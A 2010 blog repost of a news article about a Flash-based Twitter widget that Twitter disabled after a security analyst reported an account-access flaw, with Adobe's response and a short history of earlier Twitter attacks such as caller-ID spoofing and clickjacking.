XIAM007

Making Unique Observations in a Very Cluttered World

Sunday 24 January 2010

Reading - Twitter Widget Flaw Provides Access to User Accounts -

Reading - Twitter Widget Flaw Provides Access to User Accounts -



A widget based on Adobe's Flash Player was disabled by Twitter after a security analyst notified the company of a weakness permitting access into targeted user accounts.

Mike Bailey, senior security analyst at Foreground Security, revealed the weak spot in the Flash-based widget without providing details of the
Twitter exploit publicly. He is scheduled to give a presentation on vulnerabilities in Adobe's Flash Player, including the one afflicting Twitter's widget, during the Black Hat 2010 security conference in early February.

No user accounts at Twitter were known to be affected though Bailey suggested that if the flaw was exploited by hackers it was "impossible to know".

Adobe Mum Over Widget

Adobe officials made no comment regarding the incident with the
Twitter widget but disclosed details about the vulnerability in their Adobe Flash Player after it was uncovered in 2006.

"As simple as the attack is, I've been finding them all over the place," Bailey told Reuters.

Bailey has pointed out weaknesses in Flash several times during the past, including this previous November when he highlighted a different vulnerability exposing a "huge number of sites" due to methods Flash and web browsers use in handling security policies.

"The topic raised is not news; it's something that has been understood and discussed by the security community for years. Most importantly, this is
not a vulnerability in Adobe Flash Player," said Peleus Uhley, on Adobe's Secure Software Engineering Team (ASSET) blog to the November criticism.

It remains to be seen if Adobe will react the same to the current widget incident and the situation, then and now, has been difficult for Adobe. Patches to the software could break web-based applications and widgets for websites across the Internet, yet leaves web users and server administrators exposed to vulnerabilities which remain unresolved.

"Web servers that choose to accept user-uploaded content also choose to accept risks that go along with that functionality," said Uhley.

History of Attacks, Vulnerabilities at

The social media company and its users have suffered through several notable attacks and vulnerabilities since
Twitter began in early 2006.

One such vulnerability arose in 2007, resulting from Twitter's use of caller ID to identify users. Attackers were able to
spoof a caller ID number, deceiving Twitter's authentication system and effectively taking control over the associated user account.

Twitter users also fell prey to "clickjacking" attacks during February of last year. Tempted by links saying "Don't Click" users were jaunted off to an undesired website while unwittingly sending the same alluring message to followers, exacerbating the cycle.